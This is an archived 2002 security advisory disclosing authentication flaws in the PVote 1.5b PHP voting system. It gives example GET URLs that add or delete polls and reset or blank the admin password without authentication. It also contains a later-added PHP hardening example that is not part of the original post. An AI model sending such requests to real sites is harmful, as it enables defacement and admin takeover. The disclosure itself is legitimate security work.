[[ TH 026 Inc. ]] SA #1 - Multiple vulnerabilities in PVote 1.5

From: Daniel Nyström (exceat_private)
Date: Wed Apr 17 2002 - 18:03:02 PDT


                Telhack Security Advisory - #1
    _________________________________________
    
    Name: PVote 1.5b
    Impact: Minor (Content manipulation, Script admin)
    Date: April 18 / 2002
    _________________________________________
    
    Daniel Nyström <exceat_private>
    
    
    _I N F O_
    PVote is a PHP voting system. It uses MySQL to hold all information about
    the system.
    The author has been notified of all three problems described in this advisory.
    
    
    _P R O B L E M_
    Many of the scripts in the PVote package do not properly check who the
    user is and therefore let anyone add or delete polls at any time. There is
    also a vulnerability that lets anyone change the admin password or set it
    to an empty string.
    
    
    _I M P A C T_
    Minor, as content manipulation ain't too bad after all. Just a little bit
    embarrassing.
    
    
    _E X P L O I T I N G_
    These 'Add/Del' and 'Admin change pass' vulns can all be exploited from a
    web browser by basic GET requests that might look something like these:
    
    ADD
    http://isp.net/pvote/add.php?question=AmIgAy&o1=yes&o2=yeah&o3=well..yeah&o4=bad
    question is the question :) o1-o4 are the options.
    
    DEL
    http://isp.net/pvote/del.php?pollorder=1
    pollorder is the poll 'id' number. It can be found by stepping through
    poll.php to find the id as shown below:
    http://isp.net/pvote/poll.php?pollorder=1
    and then increasing pollorder (pollorder=2) and so on until you find what
    you want.
    
    CHANGE ADMIN PASS
    http://isp.net/pvote/ch_info.php?newpass=owned&confirm=owned
    Again we are allowed to change stuff without having to authenticate in
    any way.
    If we just wanna fuck with the admin we may just enter this:
    http://isp.net/pvote/ch_info.php
    As it sets both newpass and confirm to "", it sets the pass to "". This
    could have been avoided by just adding a line of code that required you to
    submit the old pass to be able to change it.
    
    
    _F I X E S_
    Many of the scripts in this package need some kind of secure
    authentication method that stops users from behaving badly >:) and I think
    it is up to the author(s?) to fix that.
    But until then, I would recommend removing the package.
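    As an added example (not PVote's own code, nor the advisory author's), here is
    how the state-changing scripts could be guarded and how ch_info.php could be
    rewritten so that a password change requires a logged-in admin, the current
    password, a non-empty confirmed new password and a POST with a CSRF token.
    The table name `admin`, its columns `id` and `pass_hash`, the `$db` mysqli
    connection, the session keys `admin_id` and `csrf`, and the form field names
    are all assumptions for the sake of the example; mysqli's `get_result()`
    additionally assumes the mysqlnd driver.

```php
<?php
// auth_guard.php -- added example, not part of PVote.
// Assumed schema: table `admin` with columns `id` (int) and `pass_hash`
// (output of password_hash). Assumed: $db is a mysqli connection created by
// a config include, and login.php stored `admin_id` and a random `csrf`
// token in the session after a successful password_verify().
declare(strict_types=1);

session_start();

// add.php, del.php and ch_info.php include this file first, so a request that
// is not from an authenticated admin is refused before any SQL runs. State
// changes are restricted to POST so a bare GET link cannot trigger them.
function require_admin(): void
{
    if (empty($_SESSION['admin_id'])) {
        http_response_code(403);
        exit('Forbidden: admin login required');
    }
    if ($_SERVER['REQUEST_METHOD'] !== 'POST') {
        http_response_code(405);
        exit('Method not allowed');
    }
    // Constant-time comparison; hash_equals() also rejects a missing token.
    if (!hash_equals($_SESSION['csrf'] ?? '', (string) ($_POST['csrf'] ?? ''))) {
        http_response_code(400);
        exit('Bad CSRF token');
    }
}

// Change the admin password. The checks that the original ch_info.php lacked:
// the caller is authenticated (via require_admin), the current password must
// verify, and an empty or unconfirmed new password is rejected, so the
// "no parameters sets the pass to empty" case can no longer happen.
function change_admin_password(
    mysqli $db,
    int $adminId,
    string $oldPass,
    string $newPass,
    string $confirm
): string {
    if (strlen($newPass) < 8) {
        return 'New password must be at least 8 characters';
    }
    if (!hash_equals($newPass, $confirm)) {
        return 'New password and confirmation do not match';
    }

    // Prepared statements keep the id out of the SQL text.
    $stmt = $db->prepare('SELECT pass_hash FROM admin WHERE id = ?');
    $stmt->bind_param('i', $adminId);
    $stmt->execute();
    $row = $stmt->get_result()->fetch_assoc();
    if ($row === null || !password_verify($oldPass, $row['pass_hash'])) {
        return 'Current password is incorrect';
    }

    $hash = password_hash($newPass, PASSWORD_DEFAULT);
    $stmt = $db->prepare('UPDATE admin SET pass_hash = ? WHERE id = ?');
    $stmt->bind_param('si', $hash, $adminId);
    $stmt->execute();
    return 'ok';
}

// ch_info.php (hardened) using the helpers above.
require_admin();
echo change_admin_password(
    $db,
    (int) $_SESSION['admin_id'],
    (string) ($_POST['oldpass'] ?? ''),
    (string) ($_POST['newpass'] ?? ''),
    (string) ($_POST['confirm'] ?? '')
);
```

    add.php and del.php would call `require_admin()` at the top in the same way;
    the point is that the authorization decision is made in one place that every
    state-changing script must pass through, rather than being left to each
    script individually.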
    
    
    /Daniel Nyström a.k.a excE @ Telhack 026 Inc.
    
    
    http://excelsi0r.darktech.org/~exce/
    http://www.telhack.com <- page temporarily down.
    



    This archive was generated by hypermail 2b30 : Thu Apr 18 2002 - 09:08:46 PDT